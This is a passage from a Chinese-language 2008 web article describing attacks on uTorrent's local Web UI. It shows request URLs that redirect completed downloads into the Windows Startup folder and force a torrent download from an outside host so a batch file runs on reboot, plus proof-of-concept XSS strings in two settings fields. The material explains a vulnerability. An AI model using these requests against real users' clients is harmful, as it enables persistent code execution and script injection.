利用基于Web的黑客技术造攻击uTorrent客户端
2008-12-12 13:40:12 来源:WEB开发网http://localhost:14774/gui/?action=setsetting&s=dir_completed_download&v=C:Documents%20and%20SettingsAll%20UsersStart%20MenuProgramsStartup
这时,他们的uTorrent的下载首选项现在将变成下面的样子:
图3 修改后的首选项
这样的话,下载后的文件将被移动到All Users的启动文件夹,并且只要攻击者能够强迫用户下载文件,实际上他们就已经得手了。例如,攻击者可以通过下列方法来强迫用户下载一个torrent文件:
http://localhost:14774/gui/?action=add-url&s=http://www.whatever.com/file.torrent
假设该torrent文件让uTorrent下载一个名为pwn.bat的文件。下载一旦完成,pwn.bat就会位于启动文件夹,所以当用户重新引导系统时该文件就会被执行。但是等一下,情况还会更糟……
三、uTorrent客户端中的跨站脚本漏洞
Utorrent的Web用户界面还容易受到跨站脚本XSS的攻击!还记得之前有关本地Web服务器的危险性的文章吗?详情可以参见《利用跨站脚本攻击Eclipse本地Web服务器》一文。 实际上,那篇文章中介绍的跟本文介绍的漏洞利用有些不同之处。下面是一个用于测试该漏洞的概念验证性质的攻击字符串。
http://localhost:14774/gui/?action=setsetting&s=tracker_ip&v=%3Cscript%3Ealert('xss')%3C/script%3E
http://localhost:14774/gui/?action=setsetting&s=ct_hist_comm&v=%3Cscript%3Ealert('xss')%3C/script%3E
更多精彩
赞助商链接